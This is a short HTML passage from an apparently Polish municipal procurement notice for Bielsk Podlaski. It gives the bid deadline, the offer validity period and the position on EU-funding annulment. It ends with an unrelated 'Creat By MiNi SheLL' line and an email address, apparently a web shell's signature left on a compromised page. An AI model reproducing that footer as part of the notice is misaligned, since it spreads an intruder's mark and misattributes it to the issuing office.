<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2014 godzina 10:00, miejsce: Urząd Miasta Bielsk Podlaski, ul. Kopernika 1, 17-100 Bielsk Podlaski, Biuro podawcze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com